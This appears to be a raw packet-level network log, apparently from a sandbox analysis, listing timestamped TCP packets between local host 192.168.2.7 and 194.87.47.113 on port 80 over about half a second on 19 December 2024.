Dec 19, 2024 08:47:30.569072008 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.570100069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.570123911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.570208073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.570975065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.580972910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.581027031 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.581131935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.581537008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.581552982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.581670046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.582227945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.582284927 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.582712889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.583112955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.583173037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.583174944 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.583548069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.583600998 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.584012032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.584037066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.584099054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.584717989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.585078955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.585455894 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.585555077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.585572958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.585678101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.586265087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.587035894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.587052107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.587136984 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.587394953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.587866068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.587882996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.587950945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.591139078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.591855049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.591872931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.591888905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.591938972 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.592612028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.592628956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.592730045 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.593324900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.593342066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.593404055 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.594063044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.594091892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.594364882 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.594921112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.594937086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.594954014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.594988108 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.595856905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.595875025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.596375942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.596393108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.596445084 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.598469019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.598485947 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.598546982 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.598880053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.598897934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.598946095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.599720955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.599737883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.599848986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.600284100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.600300074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.600358963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.600992918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.601008892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.601078033 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.601694107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.601717949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.601933956 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.603291988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.604057074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.604074001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.604187965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.604187965 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.604824066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.604842901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.604958057 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.605647087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.605663061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.605765104 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.606429100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.606447935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.606472015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.606586933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.607027054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.607043028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.607820988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.607846975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.607944012 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.608623028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.608639002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.609191895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.609208107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.609292984 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.609903097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.609919071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.610012054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.610661030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.610677004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.610723972 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.611438990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.611455917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.611546040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.611951113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.611968040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.612050056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.612656116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.612672091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.612771034 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.613491058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.613507986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.613595963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.613998890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.614016056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.614074945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.614712000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.614742041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.614882946 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.615466118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.615483046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.615533113 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.616099119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.616115093 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.616173983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.616759062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.617134094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.617419004 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.617511034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.617527962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.617636919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.618170023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.618674040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.618690014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.618762016 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.618762016 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.619216919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.619605064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.619621992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.619744062 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.620358944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.620428085 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.620853901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.621247053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.621325970 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.760448933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.760858059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.760961056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.761007071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.761028051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.761112928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.761713028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.762080908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.762403965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.762460947 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.772875071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.773075104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.773099899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.773526907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.773534060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.774087906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.774173975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.774461985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.774813890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.774888992 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.775105000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.775368929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.775437117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.775871038 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.776057959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.776132107 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.776626110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.776819944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.776897907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.777482033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.777679920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.778212070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.778322935 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.778630018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.779016972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.779069901 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.779211044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.779908895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.780060053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.780255079 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.782337904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.782535076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.782862902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.782984018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.783221006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.783864021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.783914089 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.784120083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.784425020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.784607887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.784668922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.784948111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.785393000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.785479069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.785747051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.786210060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.786319971 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.786379099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.787023067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.787161112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.787256002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.787772894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.787944078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.788640022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.788711071 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.788955927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.789338112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.789390087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.789741039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.790164948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.790364027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.790431023 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.790941954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.791131973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.791753054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.791837931 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.792077065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.792601109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.792704105 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.792958021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.793291092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.793435097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.793694973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.794117928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.794169903 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.794344902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.794902086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.795066118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.795109987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.795758009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.795921087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.796009064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.796482086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.796752930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.797271013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.797342062 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.797521114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.798110962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.798260927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.798352003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.798860073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.799041033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.799093008 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.799632072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.799807072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.799860001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.800451040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.800684929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.800754070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.801249027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.801425934 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.801428080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.801990986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.802166939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.802282095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.802828074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.802989006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.803601027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.803713083 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.803970098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.804419994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.804465055 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.804780006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.805190086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.805290937 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.805464029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.806025028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.806214094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.806299925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.806756973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.807161093 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.807216883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.807596922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.807796001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.807872057 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.808379889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.808782101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.808891058 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.809154987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.809441090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.809463024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.809973001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.810034990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.810125113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.810754061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.810909986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.810976028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.811515093 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.811611891 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.811690092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.812325954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.812382936 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.812547922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.813097954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.813163996 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.952820063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.952930927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.953006029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.953038931 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.953543901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.953876019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.953891993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.954030037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.954617023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.954786062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.957473993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.981832981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.982070923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.982108116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.982386112 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.982722998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.982739925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.982793093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.983494043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.983510971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.984282970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.984299898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.984314919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.984394073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.984394073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.985027075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.985043049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.985122919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:30.985810041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.985826969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.986579895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.986596107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:30.986648083 CET	49707	80	192.168.2.7	194.87.47.113
